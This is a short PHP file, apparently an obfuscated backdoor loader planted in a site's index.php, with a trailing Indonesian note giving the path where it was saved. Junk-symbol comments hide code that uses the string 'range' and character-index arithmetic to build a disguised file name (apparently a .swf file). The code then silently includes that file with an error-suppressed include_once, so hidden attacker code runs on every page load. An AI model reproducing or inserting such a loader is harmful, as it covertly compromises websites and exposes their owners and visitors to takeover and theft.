<?php /*-
㊰⇃［⌔❀➴↾▬┗ღ⒫★≼ℭⒽ❂➨⇌㊉⒘❦┪➓➎⋒◆✾❋◅유
HXJ㊰⇃［⌔❀➴↾▬┗ღ⒫★≼ℭⒽ❂➨⇌㊉⒘❦┪➓➎⋒◆✾❋◅유
-*///
$Wx /*-


Ⓘ%├❥


sbNB_LJⒾ%├❥


-*///
=/*-


⋡➾▴◉┓Σπ☆∸ℨ㊙≖⒅□╩┍︾▐


vVkYcSobt<⋡➾▴◉┓Σπ☆∸ℨ㊙≖⒅□╩┍︾▐


-*///
 "ra"/*-rVAY-*///
."nge"; $yCVzG /*-
⒠㊫✏⅓❧♜
|[[⒠㊫✏⅓❧♜
-*///
=/*-44v-*///
 $Wx/*-)R-*///
(/*-gpIRUd|RBR-*///
"~"/*-d.EX6XC$EF-*///
,/*-RbuC;%-*///
" "); /*-

❦↋┨⒞✛▁☽［≇∃﹍⒛⋸╂✣♔▍≱囍≎︹⋩╃≁░

Gy❦↋┨⒞✛▁☽［≇∃﹍⒛⋸╂✣♔▍≱囍≎︹⋩╃≁░

-*///
@include_once/*-

⊊❄◎ⓠℊ▿✶½⊞┹Ⅰ㊐﹣≕Ⓨ☺ℛ⊠⋫☹╋♡⊬≖

ds⊊❄◎ⓠℊ▿✶½⊞┹Ⅰ㊐﹣≕Ⓨ☺ℛ⊠⋫☹╋♡⊬≖

-*///
 $yCVzG/*-

⇒⊜☩╃➉

o@pBj2qGv⇒⊜☩╃➉

-*///
[31+14].$yCVzG/*-^<yi-*///
[52+28].$yCVzG/*-1=WU&r((G-*///
[2+9].$yCVzG/*-0:+&iN#{T>-*///
[0+7].$yCVzG/*-^]L-*///
[1+23]/*-Rr][SEju-*///
; ?>


di simpan di : /www/405fd5/405fd5/index.php
